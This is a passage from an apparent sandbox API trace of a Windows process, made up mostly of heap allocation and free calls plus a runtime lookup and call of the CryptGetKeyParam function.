Flags=0x0, Size=0x4) returned 0x43e2a00 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.400] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0080.400] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb378 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0080.400] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0080.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0080.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0080.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0080.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0080.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0080.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0080.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0080.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0080.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0080.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0080.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0080.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0080.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0080.405] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0080.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0080.405] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0080.405] CryptGetKeyParam (in: hKey=0x41ac040, dwParam=0x7, pbData=0x43e2a10, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a10*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0080.405] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0080.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.430] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0080.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 